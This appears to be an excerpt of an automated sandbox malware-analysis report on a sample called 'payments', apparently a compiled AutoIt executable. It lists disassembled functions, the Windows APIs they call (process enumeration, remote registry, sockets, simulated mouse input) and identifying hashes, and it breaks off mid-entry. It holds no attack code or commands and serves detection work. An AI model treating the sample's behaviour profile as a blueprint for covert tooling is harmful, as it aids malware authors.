                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __wcsnicmp
                                                                                                                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                          • API String ID: 1038674560-2734436370
                                                                                                                          • Opcode ID: 965c2fa66d6556eff112153e99bbf1eeb57a250142e387bfe9b76f7a115979e6
                                                                                                                          • Instruction ID: 2d5fafa1d48f3a639efba23733a4e44bf9215717e725986fbf9c528b3ae868c8
                                                                                                                          • Opcode Fuzzy Hash: 965c2fa66d6556eff112153e99bbf1eeb57a250142e387bfe9b76f7a115979e6
                                                                                                                          • Instruction Fuzzy Hash: 7A216E3110462177C321AA35EC12FB77398EF75304F64402FFA5597281F7659E42E3A5
                                                                                                                          Function 00CD0986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CD09CB
                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CD09F1
                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 00CD09F4
                                                                                                                          • SysAllocString.OLEAUT32 ref: 00CD0A15
                                                                                                                          • SysFreeString.OLEAUT32 ref: 00CD0A1E
                                                                                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 00CD0A38
                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 00CD0A46
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3761583154-0
                                                                                                                          • Opcode ID: 35edb064d32ad40ac9d256b66b6e3312c75b25ed25f1969915859070e9de7bcb
                                                                                                                          • Instruction ID: a202ce7855bc7d8b60cc1a51a64233f442ddfe256894d60d7c7f81f108fd6a9a
                                                                                                                          • Opcode Fuzzy Hash: 35edb064d32ad40ac9d256b66b6e3312c75b25ed25f1969915859070e9de7bcb
                                                                                                                          • Instruction Fuzzy Hash: D7215175600304BFDB109BECDC89DAA77ACEB09360B10812AFA19CB365DA70ED429764
                                                                                                                          Function 00CCDBBF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • IsWindowVisible.USER32(?), ref: 00CCDBD7
                                                                                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00CCDBF4
                                                                                                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00CCDC2C
                                                                                                                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00CCDC52
                                                                                                                          • _wcsstr.LIBCMT ref: 00CCDC5C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 3902887630-2594219639
                                                                                                                          • Opcode ID: 5462f3918abd8ed04cd288ae49173fd07d98c4296b3a316e54e90d29584411d5
                                                                                                                          • Instruction ID: f95b926eb38c5d5ec48ff41b0425ac3510a7e914bc1139496455212d8fe643f7
                                                                                                                          • Opcode Fuzzy Hash: 5462f3918abd8ed04cd288ae49173fd07d98c4296b3a316e54e90d29584411d5
                                                                                                                          • Instruction Fuzzy Hash: B821D472604214BBEB159B79DC49FBB7BA9DF45750F10803DF80ACA191EFA1DD42E2A0
                                                                                                                          Function 00CCBC77 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00CCBC90
                                                                                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00CCBCC2
                                                                                                                          • __itow.LIBCMT ref: 00CCBCDA
                                                                                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00CCBD00
                                                                                                                          • __itow.LIBCMT ref: 00CCBD11
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$__itow
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 3379773720-2594219639
                                                                                                                          • Opcode ID: 8e1f219d54927651766bc350a05fd08967ffe3f759fd2a5334be5b880bbf3b05
                                                                                                                          • Instruction ID: c41dd58f03526b947f25ea35a5c281fba956d260c8b044affbf0b52cdc609f34
                                                                                                                          • Opcode Fuzzy Hash: 8e1f219d54927651766bc350a05fd08967ffe3f759fd2a5334be5b880bbf3b05
                                                                                                                          • Instruction Fuzzy Hash: 2B21C335600318BBDB21AEA5CC8BFDF7A6DAF49710F104028FA16EB181DB708E0597A1
                                                                                                                          Function 00CFA2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CAD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00CAD1BA
                                                                                                                            • Part of subcall function 00CAD17C: GetStockObject.GDI32(00000011), ref: 00CAD1CE
                                                                                                                            • Part of subcall function 00CAD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00CAD1D8
                                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00CFA32D
                                                                                                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00CFA33A
                                                                                                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00CFA345
                                                                                                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00CFA354
                                                                                                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00CFA360
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                          • String ID: Msctls_Progress32
                                                                                                                          • API String ID: 1025951953-3636473452
                                                                                                                          • Opcode ID: 382471dc4299f1a3f6fe5e4f4487f8ea097c7b44adea9de149931615c1723d08
                                                                                                                          • Instruction ID: 35a29e065bb939936eb5bf2bac85591aa613cb7ef31906a218e8e35700f30495
                                                                                                                          • Opcode Fuzzy Hash: 382471dc4299f1a3f6fe5e4f4487f8ea097c7b44adea9de149931615c1723d08
                                                                                                                          • Instruction Fuzzy Hash: 9B118EB115021DBEEF115F60CC85EEBBF6DEF09798F014114BB08A60A0C6729C22DBA4
                                                                                                                          Function 00CACCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetClientRect.USER32(?,?), ref: 00CACCF6
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00CACD37
                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00CACD5F
                                                                                                                          • GetClientRect.USER32(?,?), ref: 00CACE8C
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00CACEA5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Rect$Client$Window$Screen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1296646539-0
                                                                                                                          • Opcode ID: 1c1279162c55082859972f112515d91589bdadde8bb80916f5f665b91d1e0523
                                                                                                                          • Instruction ID: b3d41174d136894490eb391650dbe1712129825f67893db2a44b8e866719a94b
                                                                                                                          • Opcode Fuzzy Hash: 1c1279162c55082859972f112515d91589bdadde8bb80916f5f665b91d1e0523
                                                                                                                          • Instruction Fuzzy Hash: E5B16E79A0024ADBDF10CFA9C5807EDBBB1FF09344F149529EC69EB254DB30AA50CB65
                                                                                                                          Function 00CF1BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00CF1C18
                                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00CF1C26
                                                                                                                          • __wsplitpath.LIBCMT ref: 00CF1C54
                                                                                                                            • Part of subcall function 00CB1DFC: __wsplitpath_helper.LIBCMT ref: 00CB1E3C
                                                                                                                          • _wcscat.LIBCMT ref: 00CF1C69
                                                                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 00CF1CDF
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00CF1CF1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1380811348-0
                                                                                                                          • Opcode ID: 9520731ebf71501bb75c4119ce964300944b992450366cd1fa09d1397e1f2129
                                                                                                                          • Instruction ID: 008353d2b15f04ca72cbaa60ea7084d7a855d231e0978bee0baeedfa6795ff76
                                                                                                                          • Opcode Fuzzy Hash: 9520731ebf71501bb75c4119ce964300944b992450366cd1fa09d1397e1f2129
                                                                                                                          • Instruction Fuzzy Hash: C4518E71104344AFD720EF64C885EABB7ECEF88754F04491EF98697291EB30DA05DBA2
                                                                                                                          Function 00CF2FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CF3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CF2BB5,?,?), ref: 00CF3C1D
                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CF30AF
                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CF30EF
                                                                                                                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00CF3112
                                                                                                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00CF313B
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00CF317E
                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00CF318B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3451389628-0
                                                                                                                          • Opcode ID: 611f84234afa1bd0bc3ca5095e2e8ce4de853a636680b0a8b1c332e4a6f2db30
                                                                                                                          • Instruction ID: 31cd37cc377a1c6f898f554912b0cdde992d5e98e924d2156f56f3a34e6a627a
                                                                                                                          • Opcode Fuzzy Hash: 611f84234afa1bd0bc3ca5095e2e8ce4de853a636680b0a8b1c332e4a6f2db30
                                                                                                                          • Instruction Fuzzy Hash: 9B513731108344AFCB04EF64C895EAEBBE9FF88304F04891DF655972A1DB31EA09DB52
                                                                                                                          Function 00CF84DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetMenu.USER32(?), ref: 00CF8540
                                                                                                                          • GetMenuItemCount.USER32(00000000), ref: 00CF8577
                                                                                                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00CF859F
                                                                                                                          • GetMenuItemID.USER32(?,?), ref: 00CF860E
                                                                                                                          • GetSubMenu.USER32(?,?), ref: 00CF861C
                                                                                                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 00CF866D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Menu$Item$CountMessagePostString
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 650687236-0
                                                                                                                          • Opcode ID: a475ba740af209cd19cecebc2777ac78b73baf6e2ee3e83737271463ac25f0c5
                                                                                                                          • Instruction ID: fe78e47e30c5361827366f227a1f99c36658b63ce57d572f1da0e658036be6e8
                                                                                                                          • Opcode Fuzzy Hash: a475ba740af209cd19cecebc2777ac78b73baf6e2ee3e83737271463ac25f0c5
                                                                                                                          • Instruction Fuzzy Hash: F9517A31A00629AFDF11EFA8C845AEEB7B5EF48310F108459FA15FB351DB30AE459B91
                                                                                                                          Function 00CD4AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _memset.LIBCMT ref: 00CD4B10
                                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CD4B5B
                                                                                                                          • IsMenu.USER32(00000000), ref: 00CD4B7B
                                                                                                                          • CreatePopupMenu.USER32 ref: 00CD4BAF
                                                                                                                          • GetMenuItemCount.USER32(000000FF), ref: 00CD4C0D
                                                                                                                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00CD4C3E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3311875123-0
                                                                                                                          • Opcode ID: 588c8ce92b818e3f6dd00fe521279f6d53c15e1f684cd62808854aaeb4b6cbfb
                                                                                                                          • Instruction ID: dda3c709f5927b1624902168f36b08b44a952b10b4fe25fcc2348ce4f6e8559a
                                                                                                                          • Opcode Fuzzy Hash: 588c8ce92b818e3f6dd00fe521279f6d53c15e1f684cd62808854aaeb4b6cbfb
                                                                                                                          • Instruction Fuzzy Hash: 6751DF70601309EBDF28CF68C888BADBBF5AF95314F14815BE7259A390D7719A40CB61
                                                                                                                          Function 00CE8DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,00D2DC00), ref: 00CE8E7C
                                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00CE8E89
                                                                                                                          • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00CE8EAD
                                                                                                                          • #16.WSOCK32(?,?,00000000,00000000), ref: 00CE8EC5
                                                                                                                          • _strlen.LIBCMT ref: 00CE8EF7
                                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00CE8F6A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$_strlenselect
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2217125717-0
                                                                                                                          • Opcode ID: 7100e25d771ec93b7d83d4c88c2f439d97772b9b0d158e85a1aee62188fd4826
                                                                                                                          • Instruction ID: 4480034c6de38473082c4264e9c7e19368fb671c35a8f01bac47bba723200932
                                                                                                                          • Opcode Fuzzy Hash: 7100e25d771ec93b7d83d4c88c2f439d97772b9b0d158e85a1aee62188fd4826
                                                                                                                          • Instruction Fuzzy Hash: 1341B371500244AFCB14EBA5CD99EEEB7BAAF48314F104269F51AE72D1DF30AE44DB60
                                                                                                                          Function 00CAABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CAB34E: GetWindowLongW.USER32(?,000000EB), ref: 00CAB35F
                                                                                                                          • BeginPaint.USER32(?,?,?), ref: 00CAAC2A
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00CAAC8E
                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00CAACAB
                                                                                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00CAACBC
                                                                                                                          • EndPaint.USER32(?,?,?,?,?), ref: 00CAAD06
                                                                                                                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00D0E673
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2592858361-0
                                                                                                                          • Opcode ID: 5f2dd7c38e05da22622aed385f12c03feadb8153b46074aa37eec0eb74ffe508
                                                                                                                          • Instruction ID: 3786a40668311b2099c6ce9020d74b429afad8aa03301ca5029978b98a0e3097
                                                                                                                          • Opcode Fuzzy Hash: 5f2dd7c38e05da22622aed385f12c03feadb8153b46074aa37eec0eb74ffe508
                                                                                                                          • Instruction Fuzzy Hash: D141A170104301AFD710DF24DC84FBB7BA8EB5A329F180669F9A4C72A1C7319945DB72
                                                                                                                          Function 00CD98BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 00CD98D1
                                                                                                                            • Part of subcall function 00CAF4EA: std::exception::exception.LIBCMT ref: 00CAF51E
                                                                                                                            • Part of subcall function 00CAF4EA: __CxxThrowException@8.LIBCMT ref: 00CAF533
                                                                                                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00CD9908
                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 00CD9924
                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00CD999E
                                                                                                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00CD99B3
                                                                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00CD99D2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2537439066-0
                                                                                                                          • Opcode ID: a4576a4d3bbe6050aea5c4cac89e6fe04d52acc7cb8a6422b725df336a2f7416
                                                                                                                          • Instruction ID: 0e5f17c6f760cc7e9b153374883eb21137ec76076e8cc383e3607b46f48aad97
                                                                                                                          • Opcode Fuzzy Hash: a4576a4d3bbe6050aea5c4cac89e6fe04d52acc7cb8a6422b725df336a2f7416
                                                                                                                          • Instruction Fuzzy Hash: 9E316F35900205ABDB10AFA5DC85EAEB779FF45314B1480A9F904EB346DB70DA11DBA4
                                                                                                                          Function 00CE9B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetForegroundWindow.USER32(?,?,?,?,?,?,00CE77F4,?,?,00000000,00000001), ref: 00CE9B53
                                                                                                                            • Part of subcall function 00CE6544: GetWindowRect.USER32(?,?), ref: 00CE6557
                                                                                                                          • GetDesktopWindow.USER32 ref: 00CE9B7D
                                                                                                                          • GetWindowRect.USER32(00000000), ref: 00CE9B84
                                                                                                                          • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00CE9BB6
                                                                                                                            • Part of subcall function 00CD7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00CD7AD0
                                                                                                                          • GetCursorPos.USER32(?), ref: 00CE9BE2
                                                                                                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00CE9C44
                                                                                                                          Memory Dump Source
